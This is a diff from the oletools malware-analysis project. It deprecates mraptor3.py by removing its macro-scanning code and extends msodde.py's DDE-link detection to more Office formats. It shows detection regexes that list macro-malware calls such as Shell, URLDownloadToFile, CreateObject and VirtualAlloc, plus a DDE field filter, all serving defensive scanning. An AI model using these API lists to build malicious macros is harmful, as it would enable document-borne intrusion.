-__version__ = '0.51'
-
-#------------------------------------------------------------------------------
-# TODO:
-
-
-#--- IMPORTS ------------------------------------------------------------------
-
-import sys, os, logging, optparse, re
+warnings.warn('mraptor3 is deprecated, mraptor should be used instead.', DeprecationWarning)
# IMPORTANT: it should be possible to run oletools directly as scripts
# in any directory without installing them with pip or setup.py.
@@ -72,288 +12,12 @@
# And to enable Python 2+3 compatibility, we need to use absolute imports,
# so we add the oletools parent folder to sys.path (absolute+normalized path):
_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
-# print('_thismodule_dir = %r' % _thismodule_dir)
_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
-# print('_parent_dir = %r' % _thirdparty_dir)
-if not _parent_dir in sys.path:
+if _parent_dir not in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty.xglob import xglob
-from oletools.thirdparty.tablestream import tablestream
-
-# import the python 3 version of olevba
-from oletools import olevba3 as olevba
-
-# === LOGGING =================================================================
-
-# a global logger object used for debugging:
-log = olevba.get_logger('mraptor')
-
-
-#--- CONSTANTS ----------------------------------------------------------------
-
-# URL and message to report issues:
-# TODO: make it a common variable for all oletools
-URL_ISSUES = 'https://github.com/decalage2/oletools/issues'
-MSG_ISSUES = 'Please report this issue on %s' % URL_ISSUES
-
-# 'AutoExec', 'AutoOpen', 'Auto_Open', 'AutoClose', 'Auto_Close', 'AutoNew', 'AutoExit',
-# 'Document_Open', 'DocumentOpen',
-# 'Document_Close', 'DocumentBeforeClose', 'Document_BeforeClose',
-# 'DocumentChange','Document_New',
-# 'NewDocument'
-# 'Workbook_Open', 'Workbook_Close',
-# *_Painted such as InkPicture1_Painted
-# *_GotFocus|LostFocus|MouseHover for other ActiveX objects
-# reference: http://www.greyhathacker.net/?p=948
-
-# TODO: check if line also contains Sub or Function
-re_autoexec = re.compile(r'(?i)\b(?:Auto(?:Exec|_?Open|_?Close|Exit|New)' +
- r'|Document(?:_?Open|_Close|_?BeforeClose|Change|_New)' +
- r'|NewDocument|Workbook(?:_Open|_Activate|_Close)' +
- r'|\w+_(?:Painted|Painting|GotFocus|LostFocus|MouseHover' +
- r'|Layout|Click|Change|Resize|BeforeNavigate2|BeforeScriptExecute' +
- r'|DocumentComplete|DownloadBegin|DownloadComplete|FileDownload' +
- r'|NavigateComplete2|NavigateError|ProgressChange|PropertyChange' +
- r'|SetSecureLockIcon|StatusTextChange|TitleChange|MouseMove' +
- r'|MouseEnter|MouseLeave|))\b')
-
-# MS-VBAL 5.4.5.1 Open Statement:
-RE_OPEN_WRITE = r'(?:\bOpen\b[^\n]+\b(?:Write|Append|Binary|Output|Random)\b)'
-
-re_write = re.compile(r'(?i)\b(?:FileCopy|CopyFile|Kill|CreateTextFile|'
- + r'VirtualAlloc|RtlMoveMemory|URLDownloadToFileA?|AltStartupPath|'
- + r'ADODB\.Stream|WriteText|SaveToFile|SaveAs|SaveAsRTF|FileSaveAs|MkDir|RmDir|SaveSetting|SetAttr)\b|' + RE_OPEN_WRITE)
-
-# MS-VBAL 5.2.3.5 External Procedure Declaration
-RE_DECLARE_LIB = r'(?:\bDeclare\b[^\n]+\bLib\b)'
-
-re_execute = re.compile(r'(?i)\b(?:Shell|CreateObject|GetObject|SendKeys|'
- + r'MacScript|FollowHyperlink|CreateThread|ShellExecute)\b|' + RE_DECLARE_LIB)
-
-# short tag to display file types in triage mode:
-TYPE2TAG = {
- olevba.TYPE_OLE: 'OLE',
- olevba.TYPE_OpenXML: 'OpX',
- olevba.TYPE_Word2003_XML: 'XML',
- olevba.TYPE_MHTML: 'MHT',
- olevba.TYPE_TEXT: 'TXT',
-}
-
-
-# === CLASSES =================================================================
-
-class Result_NoMacro(object):
- exit_code = 0
- color = 'green'
- name = 'No Macro'
-
-
-class Result_NotMSOffice(object):
- exit_code = 1
- color = 'green'
- name = 'Not MS Office'
-
-
-class Result_MacroOK(object):
- exit_code = 2
- color = 'cyan'
- name = 'Macro OK'
-
-
-class Result_Error(object):
- exit_code = 10
- color = 'yellow'
- name = 'ERROR'
-
-
-class Result_Suspicious(object):
- exit_code = 20
- color = 'red'
- name = 'SUSPICIOUS'
-
-
-class MacroRaptor(object):
- """
- class to scan VBA macro code to detect if it is malicious
- """
- def __init__(self, vba_code):
- """
- MacroRaptor constructor
- :param vba_code: string containing the VBA macro code
- """
- # collapse long lines first
- self.vba_code = olevba.vba_collapse_long_lines(vba_code)
- self.autoexec = False
- self.write = False
- self.execute = False
- self.flags = ''
- self.suspicious = False
- self.autoexec_match = None
- self.write_match = None
- self.execute_match = None
- self.matches = []
-
- def scan(self):
- """
- Scan the VBA macro code to detect if it is malicious
- :return:
- """
- m = re_autoexec.search(self.vba_code)
- if m is not None:
- self.autoexec = True
- self.autoexec_match = m.group()
- self.matches.append(m.group())
- m = re_write.search(self.vba_code)
- if m is not None:
- self.write = True
- self.write_match = m.group()
- self.matches.append(m.group())
- m = re_execute.search(self.vba_code)
- if m is not None:
- self.execute = True
- self.execute_match = m.group()
- self.matches.append(m.group())
- if self.autoexec and (self.execute or self.write):
- self.suspicious = True
-
- def get_flags(self):
- flags = ''
- flags += 'A' if self.autoexec else '-'
- flags += 'W' if self.write else '-'
- flags += 'X' if self.execute else '-'
- return flags
-
-
-# === MAIN ====================================================================
-
-def main():
- """
- Main function, called when olevba is run from the command line
- """
- global log
- DEFAULT_LOG_LEVEL = "warning" # Default log level
- LOG_LEVELS = {
- 'debug': logging.DEBUG,
- 'info': logging.INFO,
- 'warning': logging.WARNING,
- 'error': logging.ERROR,
- 'critical': logging.CRITICAL
- }
-
- usage = 'usage: %prog [options] [filename2 ...]'
- parser = optparse.OptionParser(usage=usage)
- parser.add_option("-r", action="store_true", dest="recursive",
- help='find files recursively in subdirectories.')
- parser.add_option("-z", "--zip", dest='zip_password', type='str', default=None,
- help='if the file is a zip archive, open all files from it, using the provided password (requires Python 2.6+)')
- parser.add_option("-f", "--zipfname", dest='zip_fname', type='str', default='*',
- help='if the file is a zip archive, file(s) to be opened within the zip. Wildcards * and ? are supported. (default:*)')
- parser.add_option('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
- help="logging level debug/info/warning/error/critical (default=%default)")
- parser.add_option("-m", '--matches', action="store_true", dest="show_matches",
- help='Show matched strings.')
-
- # TODO: add logfile option
-
- (options, args) = parser.parse_args()
-
- # Print help if no arguments are passed
- if len(args) == 0:
- print('MacroRaptor %s - http://decalage.info/python/oletools' % __version__)
- print('This is work in progress, please report issues at %s' % URL_ISSUES)
- print(__doc__)
- parser.print_help()
- print('\nAn exit code is returned based on the analysis result:')
- for result in (Result_NoMacro, Result_NotMSOffice, Result_MacroOK, Result_Error, Result_Suspicious):
- print(' - %d: %s' % (result.exit_code, result.name))
- sys.exit()
-
- # print banner with version
- print('MacroRaptor %s - http://decalage.info/python/oletools' % __version__)
- print('This is work in progress, please report issues at %s' % URL_ISSUES)
-
- logging.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(levelname)-8s %(message)s')
- # enable logging in the modules:
- log.setLevel(logging.NOTSET)
-
- t = tablestream.TableStream(style=tablestream.TableStyleSlim,
- header_row=['Result', 'Flags', 'Type', 'File'],
- column_width=[10, 5, 4, 56])
-
- exitcode = -1
- global_result = None
- # TODO: handle errors in xglob, to continue processing the next files
- for container, filename, data in xglob.iter_files(args, recursive=options.recursive,
- zip_password=options.zip_password, zip_fname=options.zip_fname):
- # ignore directory names stored in zip files:
- if container and filename.endswith('/'):
- continue
- full_name = '%s in %s' % (filename, container) if container else filename
- # try:
- # # Open the file
- # if data is None:
- # data = open(filename, 'rb').read()
- # except:
- # log.exception('Error when opening file %r' % full_name)
- # continue
- if isinstance(data, Exception):
- result = Result_Error
- t.write_row([result.name, '', '', full_name],
- colors=[result.color, None, None, None])
- t.write_row(['', '', '', str(data)],
- colors=[None, None, None, result.color])
- else:
- filetype = '???'
- try:
- vba_parser = olevba.VBA_Parser(filename=filename, data=data, container=container)
- filetype = TYPE2TAG[vba_parser.type]
- except Exception as e:
- # log.error('Error when parsing VBA macros from file %r' % full_name)
- # TODO: distinguish actual errors from non-MSOffice files
- result = Result_Error
- t.write_row([result.name, '', filetype, full_name],
- colors=[result.color, None, None, None])
- t.write_row(['', '', '', str(e)],
- colors=[None, None, None, result.color])
- continue
- if vba_parser.detect_vba_macros():
- vba_code_all_modules = ''
- try:
- for (subfilename, stream_path, vba_filename, vba_code) in vba_parser.extract_all_macros():
- vba_code_all_modules += vba_code.decode('utf-8','replace') + '\n'
- except Exception as e:
- # log.error('Error when parsing VBA macros from file %r' % full_name)
- result = Result_Error
- t.write_row([result.name, '', TYPE2TAG[vba_parser.type], full_name],
- colors=[result.color, None, None, None])
- t.write_row(['', '', '', str(e)],
- colors=[None, None, None, result.color])
- continue
- mraptor = MacroRaptor(vba_code_all_modules)
- mraptor.scan()
- if mraptor.suspicious:
- result = Result_Suspicious
- else:
- result = Result_MacroOK
- t.write_row([result.name, mraptor.get_flags(), filetype, full_name],
- colors=[result.color, None, None, None])
- if mraptor.matches and options.show_matches:
- t.write_row(['', '', '', 'Matches: %r' % mraptor.matches])
- else:
- result = Result_NoMacro
- t.write_row([result.name, '', filetype, full_name],
- colors=[result.color, None, None, None])
- if result.exit_code > exitcode:
- global_result = result
- exitcode = result.exit_code
-
- print('')
- print('Flags: A=AutoExec, W=Write, X=Execute')
- print('Exit code: %d - %s' % (exitcode, global_result.name))
- sys.exit(exitcode)
+from oletools.mraptor import *
+from oletools.mraptor import __doc__, __version__
if __name__ == '__main__':
main()
-
-# Soundtrack: "Dark Child" by Marlon Williams
diff --git a/oletools/mraptor_milter.py b/oletools/mraptor_milter.py
index 2856a36f..eaf01f6e 100644
--- a/oletools/mraptor_milter.py
+++ b/oletools/mraptor_milter.py
@@ -98,18 +98,7 @@
from Milter.utils import parse_addr
-if sys.version_info[0] <= 2:
- # Python 2.x
- if sys.version_info[1] <= 6:
- # Python 2.6
- # use is_zipfile backported from Python 2.7:
- from oletools.thirdparty.zipfile27 import is_zipfile
- else:
- # Python 2.7
- from zipfile import is_zipfile
-else:
- # Python 3.x+
- from zipfile import is_zipfile
+from zipfile import is_zipfile
@@ -405,7 +394,7 @@ def main():
daemon.start()
# Using python-daemon - Does not work as-is, need to create the PID file
- # See https://pypi.python.org/pypi/python-daemon/
+ # See https://pypi.org/project/python-daemon/
# See PEP-3143: https://www.python.org/dev/peps/pep-3143/
# import daemon
# import lockfile
diff --git a/oletools/msodde.py b/oletools/msodde.py
index a425513e..303d9747 100644
--- a/oletools/msodde.py
+++ b/oletools/msodde.py
@@ -3,10 +3,14 @@
msodde.py
msodde is a script to parse MS Office documents
-(e.g. Word, Excel), to detect and extract DDE links.
+(e.g. Word, Excel, RTF), to detect and extract DDE links.
Supported formats:
- Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm)
+- Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb)
+- RTF
+- CSV (exported from / imported into Excel)
+- XML (exported from Word 2003, Word 2007+, Excel 2003, (Excel 2007+?)
Author: Philippe Lagadec - http://www.decalage.info
License: BSD, see source code or documentation
@@ -15,68 +19,105 @@
http://www.decalage.info/python/oletools
"""
-# === LICENSE ==================================================================
+# === LICENSE =================================================================
-# msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info)
+# msodde is copyright (c) 2017-2019 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
+# * Redistributions of source code must retain the above copyright notice,
+# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+# -- IMPORTS ------------------------------------------------------------------
from __future__ import print_function
-#------------------------------------------------------------------------------
+import argparse
+import os
+import sys
+import re
+import csv
+
+import olefile
+
+# IMPORTANT: it should be possible to run oletools directly as scripts
+# in any directory without installing them with pip or setup.py.
+# In that case, relative imports are NOT usable.
+# And to enable Python 2+3 compatibility, we need to use absolute imports,
+# so we add the oletools parent folder to sys.path (absolute+normalized path):
+_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
+# print('_thismodule_dir = %r' % _thismodule_dir)
+_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
+# print('_parent_dir = %r' % _thirdparty_dir)
+if _parent_dir not in sys.path:
+ sys.path.insert(0, _parent_dir)
+
+from oletools import ooxml
+from oletools import xls_parser
+from oletools import rtfobj
+from oletools.ppt_record_parser import is_ppt
+from oletools import crypto
+from oletools.common.io_encoding import ensure_stdout_handles_unicode
+from oletools.common.log_helper import log_helper
+
+# -----------------------------------------------------------------------------
# CHANGELOG:
# 2017-10-18 v0.52 PL: - first version
# 2017-10-20 PL: - fixed issue #202 (handling empty xml tags)
+# 2017-10-23 ES: - add check for fldSimple codes
+# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE
+# strings together
# 2017-10-25 CH: - add json output
# 2017-10-25 CH: - parse doc
-
-__version__ = '0.52dev3'
-
-#------------------------------------------------------------------------------
-# TODO: detect beginning/end of fields, to separate each field
-# TODO: test if DDE links can also appear in headers, footers and other places
-# TODO: add xlsx support
-
-#------------------------------------------------------------------------------
+# PL: - added logging
+# 2017-11-10 CH: - added field blacklist and corresponding cmd line args
+# 2017-11-23 CH: - added support for xlsx files
+# 2017-11-24 CH: - added support for xls files
+# 2017-11-29 CH: - added support for xlsb files
+# 2017-11-29 PL: - added support for RTF files (issue #223)
+# 2017-12-07 CH: - ensure rtf file is closed
+# 2018-01-05 CH: - add CSV
+# 2018-01-11 PL: - fixed issue #242 (apply unquote to fldSimple tags)
+# 2018-01-10 CH: - add single-xml files (Word 2003/2007+ / Excel 2003)
+# 2018-03-21 CH: - added detection for various CSV formulas (issue #259)
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2018-10-25 CH: - detect encryption and raise error if detected
+# 2019-03-25 CH: - added decryption of password-protected files
+# 2019-07-17 v0.55 CH: - fixed issue #267, unicode error on Python 2
+
+
+__version__ = '0.55'
+
+# -----------------------------------------------------------------------------
+# TODO: field codes can be in headers/footers/comments - parse these
+# TODO: generalize behaviour for xlsx: find all external links (maybe rename
+# command line flag for "blacklist" to "find all suspicious" or so)
+# TODO: Test with more interesting (real-world?) samples: xls, xlsx, xlsb, docx
+# TODO: Think about finding all external "connections" of documents, not just
+# DDE-Links
+# TODO: avoid reading complete rtf file data into memory
+
+# -----------------------------------------------------------------------------
# REFERENCES:
-#--- IMPORTS ------------------------------------------------------------------
-
-# import lxml or ElementTree for XML parsing:
-try:
- # lxml: best performance for XML processing
- import lxml.etree as ET
-except ImportError:
- import xml.etree.cElementTree as ET
-
-import argparse
-import zipfile
-import os
-import sys
-import json
-
-from oletools.thirdparty import olefile
-
# === PYTHON 2+3 SUPPORT ======================================================
if sys.version_info[0] >= 3:
@@ -86,11 +127,101 @@
NS_WORD = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'
-
+NS_WORD_2003 = 'http://schemas.microsoft.com/office/word/2003/wordml'
+NO_QUOTES = False
# XML tag for 'w:instrText'
-TAG_W_INSTRTEXT = '{%s}instrText' % NS_WORD
-TAG_W_FLDSIMPLE = '{%s}fldSimple' % NS_WORD
-TAG_W_INSTRATTR= '{%s}instr' % NS_WORD
+TAG_W_INSTRTEXT = ['{%s}instrText' % ns for ns in (NS_WORD, NS_WORD_2003)]
+TAG_W_FLDSIMPLE = ['{%s}fldSimple' % ns for ns in (NS_WORD, NS_WORD_2003)]
+TAG_W_FLDCHAR = ['{%s}fldChar' % ns for ns in (NS_WORD, NS_WORD_2003)]
+TAG_W_P = ["{%s}p" % ns for ns in (NS_WORD, NS_WORD_2003)]
+TAG_W_R = ["{%s}r" % ns for ns in (NS_WORD, NS_WORD_2003)]
+ATTR_W_INSTR = ['{%s}instr' % ns for ns in (NS_WORD, NS_WORD_2003)]
+ATTR_W_FLDCHARTYPE = ['{%s}fldCharType' % ns for ns in (NS_WORD, NS_WORD_2003)]
+LOCATIONS = ('word/document.xml', 'word/endnotes.xml', 'word/footnotes.xml',
+ 'word/header1.xml', 'word/footer1.xml', 'word/header2.xml',
+ 'word/footer2.xml', 'word/comments.xml')
+
+# list of acceptable, harmless field instructions for blacklist field mode
+# c.f. http://officeopenxml.com/WPfieldInstructions.php or the official
+# standard ISO-29500-1:2016 / ECMA-376 paragraphs 17.16.4, 17.16.5, 17.16.23
+# https://www.iso.org/standard/71691.html (neither mentions DDE[AUTO]).
+# Format: (command, n_required_args, n_optional_args,
+# switches_with_args, switches_without_args, format_switches)
+FIELD_BLACKLIST = (
+ # date and time:
+ ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
+ ('DATE', 0, 0, '', 'hls', 'datetime'), # pylint: disable=bad-whitespace
+ ('EDITTIME', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
+ ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
+ ('TIME', 0, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace
+ # exclude document automation (we hate the "auto" in "automation")
+ # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT)
+ # document information
+ ('AUTHOR', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('COMMENTS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), # pylint: disable=bad-whitespace
+ ('FILENAME', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace
+ ('FILESIZE', 0, 0, '', 'km', 'numeric'), # pylint: disable=bad-whitespace
+ ('KEYWORDS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('LASTSAVEDBY', 0, 0, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('NUMCHARS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('NUMPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('NUMWORDS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('SUBJECT', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('TEMPLATE', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace
+ ('TITLE', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ # equations and formulas
+ # exlude '=' formulae because they have different syntax (and can be bad)
+ ('ADVANCE', 0, 0, 'dlruxy', '', ''), # pylint: disable=bad-whitespace
+ ('SYMBOL', 1, 0, 'fs', 'ahju', ''), # pylint: disable=bad-whitespace
+ # form fields
+ ('FORMCHECKBOX', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
+ ('FORMDROPDOWN', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
+ ('FORMTEXT', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
+ # index and tables
+ ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), # pylint: disable=bad-whitespace
+ # exlude RD since that imports data from other files
+ ('TA', 0, 0, 'clrs', 'bi', ''), # pylint: disable=bad-whitespace
+ ('TC', 1, 0, 'fl', 'n', ''), # pylint: disable=bad-whitespace
+ ('TOA', 0, 0, 'bcdegls', 'fhp', ''), # pylint: disable=bad-whitespace
+ ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), # pylint: disable=bad-whitespace
+ ('XE', 1, 0, 'frty', 'bi', ''), # pylint: disable=bad-whitespace
+ # links and references
+ # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO'
+ ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), # pylint: disable=bad-whitespace
+ ('CITATION', 1, 0, 'lfspvm', 'nty', ''), # pylint: disable=bad-whitespace
+ # exclude HYPERLINK since we are allergic to URLs
+ # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?)
+ # exclude LINK and REF (could reference other files)
+ ('NOTEREF', 1, 0, '', 'fhp', ''), # pylint: disable=bad-whitespace
+ ('PAGEREF', 1, 0, '', 'hp', ''), # pylint: disable=bad-whitespace
+ ('QUOTE', 1, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace
+ ('STYLEREF', 1, 0, '', 'lnprtw', ''), # pylint: disable=bad-whitespace
+ # exclude all Mail Merge commands since they import data from other files
+ # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF,
+ # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF)
+ # Numbering
+ ('LISTNUM', 0, 1, 'ls', '', ''), # pylint: disable=bad-whitespace
+ ('PAGE', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('REVNUM', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
+ ('SECTION', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('SECTIONPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), # pylint: disable=bad-whitespace
+ # user information # pylint: disable=bad-whitespace
+ ('USERADDRESS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('USERINITIALS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('USERNAME', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+)
+
+FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I)
+
+# filter modes
+FIELD_FILTER_DDE = 'only dde'
+FIELD_FILTER_BLACKLIST = 'exclude blacklisted'
+FIELD_FILTER_ALL = 'keep all'
+FIELD_FILTER_DEFAULT = FIELD_FILTER_BLACKLIST
+
# banner to be printed at program start
BANNER = """msodde %s - http://decalage.info/python/oletools
@@ -98,11 +229,13 @@
Please report any issue at https://github.com/decalage2/oletools/issues
""" % __version__
-BANNER_JSON = dict(type='meta', version=__version__, name='msodde',
- link='http://decalage.info/python/oletools',
- message='THIS IS WORK IN PROGRESS - Check updates regularly! '
- 'Please report any issue at '
- 'https://github.com/decalage2/oletools/issues')
+# === LOGGING =================================================================
+
+DEFAULT_LOG_LEVEL = "warning" # Default log level
+
+# a global logger object used for debugging:
+logger = log_helper.get_or_create_silent_logger('msodde')
+
# === ARGUMENT PARSING =======================================================
@@ -122,11 +255,39 @@ def existing_file(filename):
def process_args(cmd_line_args=None):
- parser = ArgParserWithBanner(description='A python tool to detect and extract DDE links in MS Office files')
+ """ parse command line arguments (given ones or per default sys.argv) """
+ parser = ArgParserWithBanner(description='A python tool to detect and '
+ 'extract DDE links in MS Office files')
parser.add_argument("filepath", help="path of the file to be analyzed",
type=existing_file, metavar='FILE')
- parser.add_argument("--json", '-j', action='store_true',
- help="Output in json format")
+ parser.add_argument('-j', "--json", action='store_true',
+ help="Output in json format. Do not use with -ldebug")
+ parser.add_argument("--nounquote", help="don't unquote values",
+ action='store_true')
+ parser.add_argument('-l', '--loglevel', dest="loglevel", action="store",
+ default=DEFAULT_LOG_LEVEL,
+ help="logging level debug/info/warning/error/critical "
+ "(default=%(default)s)")
+ parser.add_argument("-p", "--password", type=str, action='append',
+ help='if encrypted office files are encountered, try '
+ 'decryption with this password. May be repeated.')
+ filter_group = parser.add_argument_group(
+ title='Filter which OpenXML field commands are returned',
+ description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
+ '(e.g. .doc). These options are mutually exclusive, last '
+ 'option found on command line overwrites earlier ones.')
+ filter_group.add_argument('-d', '--dde-only', action='store_const',
+ dest='field_filter_mode', const=FIELD_FILTER_DDE,
+ help='Return only DDE and DDEAUTO fields')
+ filter_group.add_argument('-f', '--filter', action='store_const',
+ dest='field_filter_mode',
+ const=FIELD_FILTER_BLACKLIST,
+ help='Return all fields except harmless ones')
+ filter_group.add_argument('-a', '--all-fields', action='store_const',
+ dest='field_filter_mode', const=FIELD_FILTER_ALL,
+ help='Return all fields, irrespective of their '
+ 'contents')
+ parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT)
return parser.parse_args(cmd_line_args)
@@ -134,29 +295,32 @@ def process_args(cmd_line_args=None):
# === FUNCTIONS ==============================================================
# from [MS-DOC], section 2.8.25 (PlcFld):
-# A field consists of two parts: field instructions and, optionally, a result. All fields MUST begin with
-# Unicode character 0x0013 with sprmCFSpec applied with a value of 1. This is the field begin
-# character. All fields MUST end with a Unicode character 0x0015 with sprmCFSpec applied with a value
-# of 1. This is the field end character. If the field has a result, then there MUST be a Unicode character
-# 0x0014 with sprmCFSpec applied with a value of 1 somewhere between the field begin character and
-# the field end character. This is the field separator. The field result is the content between the field
-# separator and the field end character. The field instructions are the content between the field begin
-# character and the field separator, if one is present, or between the field begin character and the field
-# end character if no separator is present. The field begin character, field end character, and field
-# separator are collectively referred to as field characters.
-
-
-def process_ole_field(data):
+# A field consists of two parts: field instructions and, optionally, a result.
+# All fields MUST begin with Unicode character 0x0013 with sprmCFSpec applied
+# with a value of 1. This is the field begin character. All fields MUST end
+# with a Unicode character 0x0015 with sprmCFSpec applied with a value of 1.
+# This is the field end character. If the field has a result, then there MUST
+# be a Unicode character 0x0014 with sprmCFSpec applied with a value of 1
+# somewhere between the field begin character and the field end character. This
+# is the field separator. The field result is the content between the field
+# separator and the field end character. The field instructions are the content
+# between the field begin character and the field separator, if one is present,
+# or between the field begin character and the field end character if no
+# separator is present. The field begin character, field end character, and
+# field separator are collectively referred to as field characters.
+
+
+def process_doc_field(data):
""" check if field instructions start with DDE
expects unicode input, returns unicode output (empty if not dde) """
- #print('processing field \'{0}\''.format(data))
+ logger.debug(u'processing field \'{0}\''.format(data))
if data.lstrip().lower().startswith(u'dde'):
- #print('--> is DDE!')
return data
- else:
- return u''
+ if data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'):
+ return data
+ return u''
OLE_FIELD_START = 0x13
@@ -165,11 +329,11 @@ def process_ole_field(data):
OLE_FIELD_MAX_SIZE = 1000 # max field size to analyze, rest is ignored
-def process_ole_stream(stream):
- """ find dde links in single ole stream
+def process_doc_stream(stream):
+ """ find dde links in single word ole stream
- since ole file stream are subclasses of io.BytesIO, they are buffered, so
- reading char-wise is not that bad performanc-wise """
+ since word ole file stream are subclasses of io.BytesIO, they are buffered,
+ so reading char-wise is not that bad performanc-wise """
have_start = False
have_sep = False
@@ -180,16 +344,14 @@ def process_ole_stream(stream):
while True:
idx += 1
char = stream.read(1) # loop over every single byte
- if len(char) == 0:
+ if len(char) == 0: # pylint: disable=len-as-condition
break
else:
char = ord(char)
if char == OLE_FIELD_START:
- #print('DEBUG: have start at {}'.format(idx))
- #if have_start:
- # print("DEBUG: dismissing previous contents of length {}"
- # .format(len(field_contents)))
+ if have_start and max_size_exceeded:
+ logger.debug('big field was not a field after all')
have_start = True
have_sep = False
max_size_exceeded = False
@@ -200,117 +362,608 @@ def process_ole_stream(stream):
# now we are after start char but not at end yet
if char == OLE_FIELD_SEP:
- #print('DEBUG: have sep at {}'.format(idx))
+ if have_sep:
+ logger.debug('unexpected field: has multiple separators!')
have_sep = True
elif char == OLE_FIELD_END:
- #print('DEBUG: have end at {}'.format(idx))
